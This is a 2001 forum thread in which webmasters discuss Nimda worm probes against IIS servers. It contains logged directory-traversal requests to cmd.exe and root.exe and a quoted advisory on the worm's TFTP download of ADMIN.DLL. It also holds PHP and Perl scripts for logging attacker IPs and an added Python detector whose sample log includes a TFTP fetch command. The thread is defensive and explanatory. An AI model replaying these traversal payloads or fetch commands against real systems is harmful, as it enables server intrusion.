
Thread: HEADS up for you ppl running webservers...

  1. #1
    Vice Admiral Nanotech9

    HEADS up for you ppl running webservers...

    I copied this from my screen logs on my webserver... I can't make heads or tails of it, except that someone or something is desperately trying to **** up my webserver. I think it may be a mutated version of the Code Red worm...

    Watch your servers, ppl.


    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\scripts\..%2f..\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\scripts\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\scripts\..S5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\scripts\..S5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\scripts\..Áœ..\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\scripts\..À¯..\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\scripts\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\scripts\..Á..\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\msadc\..%5c..\..%5c..\..%5c\..Á..\..Á..\..Á..\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\_mem_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\_vti_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:49 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\c\winnt\system32\cmd.exe" - The system cannot find the path specified.
    wqn.com 209.223.6.27 - [18/Sep/2001:21:43:48 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\MSADC\root.exe" - The system cannot find the path specified.
    frp1h51.coserv.net 209.223.6.27 - [18/Sep/2001:21:38:45 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 337 "" ""
    Error reading "D:\FTP\public\scripts\root.exe" - The system cannot find the path specified.
    TCP/IP Stack: WinSock 2.0 (1.1; 2.2) running on Windows NT/2000

  2. #2
    I run several servers as webhosting is my primary business.

    All domains which are being hosted on my servers are receiving these same requests.

    Will look into it further.

  3. #3
    Commander ironchef
    Yeah, my server at home's getting hosed right now. I have no access to it from here though, only to connect and see how bloody slow she's moving. Fockers. But FTP'ing in is slow as hell, and my radio station was buffering every few seconds.

    The Cold Fusion mailing list also confirms it... several have reported attempts on their servers.

    Something too about .eml files being littered around the server which their virus scanner isn't detecting. I'll let you know if I find more about it.

    Also had an unpleasant e-mail this morning. The bastards somehow encoded the attachment so it'll launch on clicking the e-mail and prompt to save or execute the .exe file. Duh, in that I'm not gonna run it, but that's a pretty sneaky tactic.
    blurt blurt blurt

  4. #4
    Lieutenant Commander JPR
    > yeah, my server at home's getting hosed right now

    I see everything is going as planned.

    > and my radio station was buffering every few seconds

    The music isn't that good anyways.

  5. #5
    Fleet Admiral Speedfreak
    Sorry about that.
    Call me Fleet Admiral §pêêЃrêák™! Go get me some coffee.
    CoolSpeed

  6. #6
    Commander ironchef

    Alert: Some sort of IIS worm seems to be propagating

    Sorry for the strange wraps... from an e-mail:

    and john, you smell

    -----BEGIN PGP SIGNED MESSAGE-----

    There have been numerous reports of IIS attacks being generated by
    machines over a broad range of IP addresses. These "infected"
    machines are using a wide variety of attacks which attempt to exploit
    already known and patched vulnerabilities against IIS.

    It appears that the attacks can come both from email and from the
    network.

    A new worm, being called w32.nimda.amm, is being sent around. The
    attachment is called README.EXE and comes as a MIME-type of
    "audio/x-wav" together with some html parts. There appears to be no
    text in this message when it is displayed by Outlook when in
    Auto-Preview mode (always a good indication there's something not
    quite right with an email.)

    The network attacks against IIS boxes are a wide variety of attacks.
    Amongst them appear to be several attacks that assume the machine is
    compromised by Code Red II (looking for ROOT.EXE in the /scripts and
    /msadc directory, as well as an attempt to use the /c and /d virtual
    roots to get to CMD.EXE). Further, it attempts to exploit numerous
    other known IIS vulnerabilities.

    One thing to note is the attempt to execute TFTP.EXE to download a
    file called ADMIN.DLL from (presumably) some previously compromised
    box.

    Anyone who discovers a compromised machine (a machine with ADMIN.DLL
    in the /scripts directory), please forward me a copy of that .dll
    ASAP.

    Also, look for TFTP traffic (UDP 69). As a safeguard, consider doing
    the following:

    edit %systemroot/system32/drivers/etc/services.

    change the line:

    tftp 69/udp

    to:

    tftp 0/udp

    thereby disabling the TFTP client. W2K has TFTP.EXE protected by
    Windows File Protection, so it can't be removed.

    More information as it arises.

    Cheers,
    Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

    -----BEGIN PGP SIGNATURE-----
    Version: PGP Personal Privacy 6.5.2

    iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
    Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
    iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO
    hSW7yN2lhJc=
    =YAwc
    -----END PGP SIGNATURE-----

  7. #7
    Vice Admiral Nanotech9
    Guys, I went to www.diamondmm.com today to d/l some drivers... I noticed that EVERY FRIGGIN' page I clicked on SPAWNED a download for README.EXE.

    I never downloaded it, but I bet it's related to this...

    Fortunately, I don't use IIS. I'm just getting freakin' FLOODED though.

  8. #8
    Commander ironchef
    Yeah, that is one of the neat little tricks this will do.

    It's taking advantage of old exploits though. These servers should be patched by now, for chrissakes.

  9. #9
    Commander ironchef

    php and perl code for Apache bastids

    Someone sent this out on a list. It gives a neat little way of dealing with the hits that an Apache box is getting:

    -----
    I got tired of seeing boxes hitting my servers with this Code Red
    business, so I did something about it....

    First, I did this in the Apache configuration outside of any virtual
    hosts so it would affect every site I run:

    Alias /default.ida /usr/local/apache/vdocs/sys/codered/default.ida

    Then I did this: AddType application/x-httpd-php .ida (again, outside
    virtual hosts)

    And then I made the default.ida file:

    <?
    # $REMOTE_ADDR comes from register_globals (standard for PHP of this era)
    echo $REMOTE_ADDR;
    $msg = "CODE RED FROM $REMOTE_ADDR";
    # mail notification left disabled; the log file below is the record
    #mail("andy@m...","CODERED",$msg);
    # append the probing client's address to the hit log
    $fd = fopen("/usr/local/apache/vdocs/sys/codered/log","a");
    if ($fd) {
        fwrite($fd,"$REMOTE_ADDR\n");
        fclose($fd);
    }
    echo "YOU SUCK! DOWNLOAD THE PATCH!!";
    ?>

    so that I would have a log of every IP that has been hitting my box!
    Then I can make firewall rules to block them out completely, or I can
    contact their admins or ISPs and have them shut down.

    here are the worst offenders since 09-11-2001:
    # of times  address
          12    198.63.212.15
          17    198.234.111.91
          57    198.172.140.13
        2050    198.172.66.246
        2553    198.172.176.135

    The last two are on a closely related network to the one I'm on, which
    is why I get hit so much.

    Anyhoo, if you want to keep track of who is pounding on your server
    and might not even realize they are infected, this will do the trick.
    I also wrote a short Perl script to rotate the log:

    #!/usr/bin/perl
    use strict;
    use warnings;

    my $LOGFILE = "/usr/local/apache/vdocs/sys/codered/log";
    # timestamp suffix for the rotated copy, e.g. 091820012143
    my $date = `date +'%m%d%Y%H%M'`;
    chomp $date;
    print $date . "\n";
    my $NEWLOG = $LOGFILE . ".$date";
    # parentheses matter here: without them "||" binds to $NEWLOG and the die never fires
    rename($LOGFILE, $NEWLOG) or die "RENAME FAILED HORRIBLY $!\n";
    # recreate an empty log so the PHP handler can keep appending
    open(my $fd, ">", $LOGFILE) or die "OPEN FAILED MISERABLY $!\n";
    close($fd);
    # hand the new file to the uid/gid the web server runs as (99 on this box)
    chown 99, 99, $LOGFILE;
    print "LOG ROTATED\n";

    I hope this isn't too off topic; I thought some people might find it
    useful. If you come up with any modifications, lemme know.
    Andrew Watson
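    The log lines in post #1 and the IP tally in post #9 are the two halves of one defensive job: decode what the probe actually asked for, then count who is sending it. The script below is an added example written for this thread, not code from the thread, from Andrew Watson, or from any of the posters; it is in Python rather than the PHP/Perl above. It parses access-log lines in the format post #1 shows, repeatedly percent-decodes the request path so that double-encoded forms such as %252f and %%35c collapse to a plain slash, folds the overlong UTF-8 forms (%c0%af, %c1%9c, %c1%1c) the way the old IIS decoder did (the masking of a second byte that is not a valid continuation byte, as in %c1%1c, is an assumption about that decoder), tags the request with what it was after (traversal, cmd.exe, the root.exe backdoor and TFTP fetch named in the NTBugtraq mail), and prints a per-address count in the shape of post #9's table. The log lines, hostnames and addresses are constructed, not taken from anyone's server.

```python
"""Classify Code Red / Nimda style probes in access-log lines and tally them per
source address. Added example for this thread; not the posters' code."""
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample lines (documentation-range addresses), shaped like the thread's log.
SAMPLE_LOG = """\
www.example.net 192.0.2.10 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
www.example.net 192.0.2.10 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
www.example.net 192.0.2.10 - [18/Sep/2001:21:43:49 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "" ""
www.example.net 198.51.100.7 - [18/Sep/2001:21:38:45 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 337 "" ""
www.example.net 198.51.100.7 - [18/Sep/2001:21:39:01 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20198.51.100.7%20GET%20Admin.dll HTTP/1.0" 404 337 "" ""
www.example.net 203.0.113.5 - [18/Sep/2001:21:40:00 -0500] "GET /index.html HTTP/1.0" 200 1532 "" ""
"""

LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
CMD_EXE = re.compile(r"/cmd\.exe$", re.I)
ROOT_EXE = re.compile(r"/root\.exe$", re.I)   # Code Red II leftover named in the advisory
TFTP = re.compile(r"\btftp\b", re.I)          # ADMIN.DLL fetch named in the advisory


def fold_overlong(raw: bytes) -> bytes:
    """Collapse two-byte sequences led by 0xC0/0xC1 into the ASCII byte they encode
    (C0 AF -> '/', C1 9C -> '\\'). A strict UTF-8 decoder rejects these overlong forms;
    the lenient masking here mirrors the old IIS decoder (assumed for cases such as
    C1 1C whose second byte is not a valid continuation byte)."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def normalize(target: str, max_rounds: int = 3) -> tuple[str, int]:
    """Percent-decode and fold overlong UTF-8 until the string stops changing, then
    unify slashes. Returns (normalized, rounds); rounds > 1 means double encoding."""
    current, rounds = target, 0
    for _ in range(max_rounds):
        decoded = fold_overlong(unquote_to_bytes(current)).decode("latin-1")
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current.replace("\\", "/"), rounds


def classify(line: str):
    """Parse one log line; return a record with detection tags, or None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    norm_path, rounds = normalize(path)
    norm_query, _ = normalize(query.replace("+", " "))
    tags = []
    if TRAVERSAL.search(norm_path):
        tags.append("traversal")
    if CMD_EXE.search(norm_path):
        tags.append("cmd_exe")
    if ROOT_EXE.search(norm_path):
        tags.append("root_exe_backdoor")
    if TFTP.search(norm_query):
        tags.append("tftp_fetch")
    if rounds > 1:
        tags.append("double_encoded")
    if any(b in (0xC0, 0xC1) for b in unquote_to_bytes(path)):
        tags.append("overlong_utf8")
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "path": norm_path, "tags": tags}


def tally(log_text: str) -> list[tuple[int, str]]:
    """Count flagged requests per source address, busiest first (post #9's table)."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec["tags"]:
            counts[rec["ip"]] += 1
    return sorted(((n, ip) for ip, n in counts.items()), reverse=True)


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        rec = classify(line)
        if rec and rec["tags"]:
            print(f'{rec["ip"]:16} {rec["path"]:40} {",".join(rec["tags"])}')
    print("# of times  address")
    for n, ip in tally(SAMPLE_LOG):
        print(f"{n:10}  {ip}")
```

    Feed it a real access log with `tally(open(path).read())`; the addresses it returns are the ones to firewall or report, as post #9 describes. Note that the 404 status on every probe in post #1 is exactly what a server that is not vulnerable should return, so the point of tagging is attribution and notification, not proof of compromise.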

  10. #10
    Lieutenant Commander
    Ashcroft just mentioned this virus that was found today. He said it is not yet confirmed that it has anything to do with the terrorists. He also said that the patch for the worm was released. It is called Nimda.
